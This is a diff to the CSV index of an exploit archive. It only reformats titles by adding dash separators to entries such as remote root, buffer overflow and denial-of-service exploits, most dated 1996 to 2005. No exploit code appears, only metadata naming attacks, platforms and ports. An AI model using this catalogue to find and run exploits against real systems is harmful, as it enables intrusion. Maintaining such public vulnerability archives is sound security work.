diff --git a/files.csv b/files.csv index 13e84b5b7..9045798d3 100755 --- a/files.csv +++ b/files.csv @@ -32,7 +32,7 @@ id,file,description,date,author,platform,type,port 31,platforms/linux/local/31.pl,"CdRecord <= 2.0 - Mandrake Local Root Exploit",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 -34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 +34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 @@ -55,7 +55,7 @@ id,file,description,date,author,platform,type,port 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,anonymous,windows,remote,80 -57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 +57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit",2003-07-21,"Martin Kluge",hardware,dos,0 @@ -93,7 +93,7 @@ id,file,description,date,author,platform,type,port 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - DoS",2003-09-08,badpack3t,multiple,dos,80 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 -96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 +96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 @@ -216,46 +216,46 @@ id,file,description,date,author,platform,type,port 225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21 226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515 227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String Exploit",2000-12-11,DiGiT,linux,remote,515 -228,platforms/bsd/remote/228.c,"Oops! 1.4.6 (one russi4n proxy-server) Heap Buffer Overflow Exploit",2000-12-15,diman,bsd,remote,3128 +228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow Exploit",2000-12-15,diman,bsd,remote,3128 229,platforms/linux/local/229.c,"Linux xsoldier-0.96 Exploit (Red Hat 6.2)",2000-12-15,zorgon,linux,local,0 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 -234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD 2.6 - / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 -236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 +236,platforms/linux/dos/236.sh,"Redhat 6.1 - / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 -240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 +240,platforms/solaris/dos/240.sh,"Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 -247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 +247,platforms/solaris/local/247.c,"Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 -250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 -251,platforms/linux/dos/251.c,"APC UPS 3.7.2 (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 +250,platforms/solaris/local/250.c,"Solaris 7 - / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 +251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143 254,platforms/hardware/remote/254.c,"Cisco Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 -256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 +256,platforms/solaris/local/256.c,"Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc <= 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 -259,platforms/tru64/local/259.c,"Tru64 5 (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 +259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 262,platforms/hardware/dos/262.pl,"Cisco Multiple Products Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0 -265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 +265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit",2001-05-07,"Ryan Permeh",windows,remote,80 268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21 -270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 +270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 @@ -268,7 +268,7 @@ id,file,description,date,author,platform,type,port 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - /usr/bin/at Local Root Exploit",2001-03-02,"Cody Tubbs",tru64,local,0 282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (4)",2001-03-02,multiple,linux,remote,53 284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 -285,platforms/linux/local/285.c,"Slackware 7.1 /usr/bin/mail Local Exploit",2001-03-03,kengz,linux,local,0 +285,platforms/linux/local/285.c,"Slackware 7.1 - /usr/bin/mail Local Exploit",2001-03-03,kengz,linux,local,0 286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Local Root Exploit",2001-03-03,dethy,bsd,local,0 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Local Root Exploit",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - (prodb) Local Root Exploit",2001-03-04,"the itch",multiple,local,0 @@ -276,7 +276,7 @@ id,file,description,date,author,platform,type,port 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 ld_preload Local Exploit",2001-03-04,Shadow,linux,local,0 291,platforms/linux/remote/291.c,"TCP Connection Reset Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 293,platforms/windows/remote/293.c,"Microsoft Windows - Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011)",2004-04-24,sbaa,windows,remote,445 -294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 +294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow Exploit",2004-05-05,vade79,linux,remote,0 297,platforms/windows/remote/297.c,"Sasser Worm ftpd Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554 @@ -304,12 +304,12 @@ id,file,description,date,author,platform,type,port 322,platforms/linux/local/322.c,"Xt Library - Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0 324,platforms/windows/dos/324.txt,"Ping of Death Remote Denial of Service Exploit",1996-10-21,anonymous,windows,dos,0 325,platforms/linux/local/325.c,"BSD & Linux - lpr Command Local Root Exploit",1996-10-25,"Vadim Kolontsov",linux,local,0 -328,platforms/solaris/local/328.c,"Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits",1997-03-23,"Cristian Schipor",solaris,local,0 +328,platforms/solaris/local/328.c,"Solaris 2.4 - /bin/fdformat Local Buffer Overflow Exploits",1997-03-23,"Cristian Schipor",solaris,local,0 329,platforms/windows/dos/329.txt,"Microsoft Windows NT Crash with an Extra Long Username DoS Exploit",1997-04-01,Fyodor,windows,dos,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt XtAppInitialize() Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 -333,platforms/aix/local/333.c,"AIX 4.2 /usr/dt/bin/dtterm Local Buffer Overflow Exploit",1997-05-27,"Georgi Guninski",aix,local,0 +333,platforms/aix/local/333.c,"AIX 4.2 - /usr/dt/bin/dtterm Local Buffer Overflow Exploit",1997-05-27,"Georgi Guninski",aix,local,0 334,platforms/irix/local/334.c,"IRIX - Multiple Buffer Overflow Exploits (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 335,platforms/aix/local/335.c,"AIX lquerylv - Local Root Buffer Overflow Exploit",1997-05-26,"Georgi Guninski",aix,local,0 336,platforms/irix/local/336.c,"IRIX /bin/login Local Buffer Overflow Exploit",1997-05-26,"David Hedley",irix,local,0 @@ -426,7 +426,7 @@ id,file,description,date,author,platform,type,port 479,platforms/linux/local/479.c,"GNU Sharutils <= 4.2.1 - Local Format String PoC Exploit",2004-09-25,n4rk0tix,linux,local,0 480,platforms/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow Exploit (MS04-028)",2004-09-25,"John Bissell",windows,remote,0 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 swxxx - Local Root Shell Exploit",2002-12-11,watercloud,hp-ux,local,0 -551,platforms/linux/dos/551.c,"MyServer 0.7.1 (POST) Denial of Service Exploit",2004-09-27,"Tom Ferris",linux,dos,0 +551,platforms/linux/dos/551.c,"MyServer 0.7.1 - (POST) Denial of Service Exploit",2004-09-27,"Tom Ferris",linux,dos,0 556,platforms/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow Exploit",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf 2.2.1 - Local Buffer Overflow Exploit",2004-09-28,Delikon,windows,local,0 @@ -477,12 +477,12 @@ id,file,description,date,author,platform,type,port 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25 -621,platforms/windows/remote/621.c,"CCProxy 6.2 (ping) Remote Buffer Overflow Exploit",2004-11-10,KaGra,windows,remote,23 +621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow Exploit",2004-11-10,KaGra,windows,remote,23 623,platforms/windows/remote/623.c,"SlimFTPd <= 3.15 - Remote Buffer Overflow Exploit",2004-11-10,class101,windows,remote,21 624,platforms/linux/local/624.c,"Linux Kernel <= 2.4.27 / 2.6.8 - binfmt_elf Executable File Read Exploit",2004-11-10,"Paul Starzetz",linux,local,0 625,platforms/windows/dos/625.pl,"WinFTP Server 1.6 - Denial of Service Exploit",2004-11-11,KaGra,windows,dos,0 626,platforms/windows/dos/626.c,"Kerio Personal Firewall <= 4.1.1 - Multiple IP Options DoS Exploit",2004-11-12,houseofdabus,windows,dos,0 -627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 (DELETE) Remote Stack Overflow Exploit",2004-11-12,Zatlander,windows,remote,143 +627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow Exploit",2004-11-12,Zatlander,windows,remote,143 628,platforms/windows/dos/628.c,"NetNote Server <= 2.2 build 230 - Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 629,platforms/multiple/local/629.c,"Multiple AntiVirus (zip file) Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 630,platforms/php/webapps/630.pl,"UBB.threads 6.2.x < 6.3x - One Char Bruteforce Exploit",2004-11-15,RusH,php,webapps,0 @@ -620,7 +620,7 @@ id,file,description,date,author,platform,type,port 794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Local Root Exploit (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim <= 4.42 - Local Root Exploit",2005-02-07,darkeagle,linux,local,0 -797,platforms/windows/dos/797.py,"Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit",2005-02-07,OYXin,windows,dos,0 +797,platforms/windows/dos/797.py,"Foxmail 2.0 - (MAIL FROM:) Denial of Service Exploit",2005-02-07,OYXin,windows,dos,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 799,platforms/osx/dos/799.c,"Mac OS X AppleFileServer Remote Denial of Service Exploit",2005-02-08,nemo,osx,dos,0 800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module Remote Exploit",2005-02-08,"ALBANIA SECURITY",php,webapps,0 @@ -676,7 +676,7 @@ id,file,description,date,author,platform,type,port 853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 854,platforms/windows/remote/854.cpp,"Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit",2005-03-02,Swan,windows,remote,110 855,platforms/multiple/dos/855.pl,"Apache <= 2.0.52 - HTTP GET request Denial of Service Exploit",2005-03-04,GreenwooD,multiple,dos,0 -856,platforms/hardware/dos/856.c,"Nokia Symbian 60 (Bluetooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 +856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (Bluetooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 858,platforms/php/webapps/858.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 859,platforms/windows/remote/859.c,"CA License Server (GETCONFIG) Remote Buffer Overflow Exploit",2005-03-06,class101,windows,remote,10203 @@ -685,7 +685,7 @@ id,file,description,date,author,platform,type,port 862,platforms/cgi/webapps/862.txt,"The Includer CGI <= 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 863,platforms/windows/local/863.cpp,"RealPlayer 10 - (.smil File) Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 -865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 (skinfile) Remote File Include",2005-03-07,"Filip Groszynski",php,webapps,0 +865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 - (skinfile) Remote File Include",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 867,platforms/multiple/dos/867.c,"Ethereal <= 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 @@ -717,7 +717,7 @@ id,file,description,date,author,platform,type,port 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 -898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 +898,platforms/aix/local/898.sh,"AIX <= 5.3.0 - (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25 901,platforms/php/webapps/901.pl,"PunBB <= 1.2.2 - Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 @@ -747,13 +747,13 @@ id,file,description,date,author,platform,type,port 925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' Bluetooth Signed Buffer Index Local Root (3)",2005-10-26,qobaiashi,linux,local,0 927,platforms/windows/local/927.c,"Microsoft Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0 -928,platforms/php/webapps/928.py,"PunBB 1.2.4 (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0 +928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0 929,platforms/windows/local/929.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer DHTML Object Memory Corruption Exploit",2005-04-12,Skylined,windows,remote,0 931,platforms/windows/dos/931.html,"Microsoft Internet Explorer DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 932,platforms/windows/local/932.sql,"Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit",2005-04-13,"Esteban Fayo",windows,local,0 933,platforms/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injection Exploits",2005-04-13,"Esteban Fayo",windows,local,0 -934,platforms/linux/remote/934.c,"gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit",2005-04-13,Xpl017Elz,linux,remote,2525 +934,platforms/linux/remote/934.c,"gld 1.4 - (Postfix Greylisting Daemon) Remote Format String Exploit",2005-04-13,Xpl017Elz,linux,remote,2525 935,platforms/windows/local/935.c,"Morpheus <= 4.8 - Local Chat Passwords Disclosure Exploit",2005-04-13,Kozan,windows,local,0 936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 @@ -773,12 +773,12 @@ id,file,description,date,author,platform,type,port 951,platforms/windows/local/951.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (2)",2005-04-22,"Jean Luc",windows,local,0 952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional https Remote BoF Exploit",2005-04-25,CorryL,windows,remote,8080 953,platforms/windows/remote/953.c,"Yager <= 5.24 - Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089 -954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0 +954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 - (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0 955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21 -956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0 +956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0 957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 -959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 (isis_print) Infinite Loop DoS Exploit",2005-04-26,vade79,linux,dos,0 +959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop DoS Exploit",2005-04-26,vade79,linux,dos,0 960,platforms/windows/remote/960.c,"MySQL MaxDB Webtool <= 7.5.00.23 - Remote Stack Overflow Exploit",2005-04-27,cybertronic,windows,remote,9999 963,platforms/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure Exploit",2005-04-28,Kozan,windows,local,0 964,platforms/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 @@ -801,9 +801,9 @@ id,file,description,date,author,platform,type,port 981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String Exploit",2005-05-05,cybertronic,linux,remote,25 982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,anonymous,php,webapps,0 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0 -984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0 +984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 - (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0 986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0 -987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)",2005-05-07,Silentium,windows,remote,0 +987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 - Unauthenticated User Registeration (2)",2005-05-07,Silentium,windows,remote,0 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0 989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0 